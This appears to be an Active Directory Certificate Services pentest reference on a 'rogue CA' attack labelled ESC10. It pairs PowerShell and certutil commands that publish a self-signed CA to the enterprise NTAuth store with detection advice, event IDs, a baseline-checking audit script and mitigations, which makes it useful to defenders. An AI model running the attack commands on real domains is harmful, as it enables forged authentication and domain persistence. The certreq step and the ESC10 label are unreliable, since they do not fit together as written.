ESC10: Rogue Certificate Authority
ESC10 involves an attacker creating a rogue Certificate Authority and adding it to the enterprise NTAuth store, potentially allowing the issuance of trusted certificates for any purpose.
ESC10 is a sophisticated attack where an attacker creates a rogue Certificate Authority (CA) and manages to add it to the enterprise NTAuth store. This store determines which CAs are trusted for authentication within the domain. Once added, the attacker can issue certificates that will be trusted by all domain resources, potentially leading to complete domain compromise.
- Issuance of fully trusted certificates by an attacker
- Potential for complete domain compromise
- Man-in-the-middle attacks against domain resources
- Long-term persistence and evasion capabilities
- Create a rogue Certificate Authority
- Gain access to modify the enterprise NTAuth store
- Add the rogue CA to the NTAuth store
- Issue malicious certificates from the rogue CA
- Use these certificates for authentication and further attacks
When conducting AD CS penetration testing, consider the following aspects specific to ESC10 (Rogue Certificate Authority):
- Identify vulnerable certificate templates and misconfigurations
- Assess the potential impact on the overall AD CS security
- Evaluate the effectiveness of existing security controls
- Test for the ability to exploit this vulnerability in the target environment
- Document findings and provide actionable remediation steps
Create a new Certificate Authority
New-SelfSignedCertificate -DnsName "Rogue CA" -CertStoreLocation "Cert:\LocalMachine\My" -KeyUsage CertSign -KeyExportPolicy Exportable -NotAfter (Get-Date).AddYears(10)
Export the CA certificate
$cert = Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -eq "CN=Rogue CA"}
Export-Certificate -Cert $cert -FilePath C:\RogueCA.cer
Add the rogue CA to the NTAuth store
certutil -dspublish -f C:\RogueCA.cer NTAuthCA
Issue a certificate from the rogue CA
certreq -submit -attrib "CertificateTemplate:User" -config "Rogue CA" request.inf
- Regularly audit the enterprise NTAuth store for unauthorized changes
- Monitor for the addition of new Certificate Authorities in the domain
- Implement alerting for changes to critical PKI infrastructure
- Use security information and event management (SIEM) tools to correlate PKI-related events
- Conduct periodic security assessments of the entire PKI infrastructure
- 5137: A directory service object was created (for monitoring new CA objects)
- 4886: Certificate Services approved a certificate request
- 4887: Certificate Services denied a certificate request
- 4896: One or more rows have been added to the certificate database
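One way to put the audit guidance above into practice, as an added example that is not part of the original page: enumerate the certificates published in the enterprise NTAuth store (the object in the Configuration partition that certutil -dspublish NTAuthCA writes to), compare them against a baseline of approved thumbprints, and list the enterprise CA objects registered under Enrollment Services. It assumes the ActiveDirectory PowerShell module is installed and that $ApprovedThumbprints is a hypothetical baseline you maintain from a known-good state.

```powershell
# Added defender-side example; not code from the original page.
# Assumes the ActiveDirectory module and read access to the Configuration partition.
Import-Module ActiveDirectory

function Get-NTAuthStoreCertificates {
    # The NTAuth store lives on a single object in the Configuration naming context;
    # its multi-valued cACertificate attribute holds one DER blob per trusted CA.
    $configNC = (Get-ADRootDSE).configurationNamingContext
    $ntAuthDn = "CN=NTAuthCertificates,CN=Public Key Services,CN=Services,$configNC"
    $obj = Get-ADObject -Identity $ntAuthDn -Properties cACertificate, whenChanged
    foreach ($raw in @($obj.cACertificate)) {
        $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList (,[byte[]]$raw)
        [pscustomobject]@{
            Subject      = $cert.Subject
            Issuer       = $cert.Issuer
            SelfSigned   = ($cert.Subject -eq $cert.Issuer)
            Thumbprint   = $cert.Thumbprint
            NotAfter     = $cert.NotAfter
            StoreChanged = $obj.whenChanged   # last write to the NTAuth object
        }
    }
}

function Compare-NTAuthStore {
    # Flags any NTAuth entry whose thumbprint is not in the approved baseline.
    param([Parameter(Mandatory)][string[]]$ApprovedThumbprints)
    foreach ($c in Get-NTAuthStoreCertificates) {
        $status = if ($ApprovedThumbprints -contains $c.Thumbprint) { 'approved' } else { 'UNEXPECTED' }
        if ($status -eq 'UNEXPECTED') {
            Write-Warning "Unapproved CA in NTAuth store: $($c.Subject) [$($c.Thumbprint)]"
        }
        $c | Add-Member -NotePropertyName Status -NotePropertyValue $status -PassThru
    }
}

function Get-EnterpriseCAObjects {
    # Enterprise CAs register a pKIEnrollmentService object here; a new one is the
    # kind of object creation that event 5137 reports.
    $configNC = (Get-ADRootDSE).configurationNamingContext
    $esDn = "CN=Enrollment Services,CN=Public Key Services,CN=Services,$configNC"
    Get-ADObject -SearchBase $esDn -LDAPFilter '(objectClass=pKIEnrollmentService)' `
        -Properties dNSHostName, whenCreated |
        Select-Object Name, dNSHostName, whenCreated
}

# Usage: replace the placeholder with thumbprints captured from a known-good NTAuth store.
$ApprovedThumbprints = @('<APPROVED-CA-THUMBPRINT-PLACEHOLDER>')
Compare-NTAuthStore -ApprovedThumbprints $ApprovedThumbprints | Format-Table -AutoSize
Get-EnterpriseCAObjects | Format-Table -AutoSize
```

Run it on a schedule and alert on any UNEXPECTED row or on a StoreChanged timestamp newer than the last approved change; a self-signed entry that is not in the baseline is the pattern this attack leaves behind.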
To mitigate ESC10 (Rogue Certificate Authority) and strengthen overall AD CS security, consider implementing the following measures:
- Strictly control access to the enterprise NTAuth store
- Regularly audit the trusted root CAs in the domain
- Implement strong change management for PKI infrastructure
- Use security descriptors to limit who can manage the NTAuth store
- Implement and maintain a robust certificate revocation process
- Regularly conduct AD CS penetration testing to identify and address vulnerabilities
- Implement the principle of least privilege across your AD CS infrastructure
- Maintain up-to-date documentation of your AD CS configuration and security policies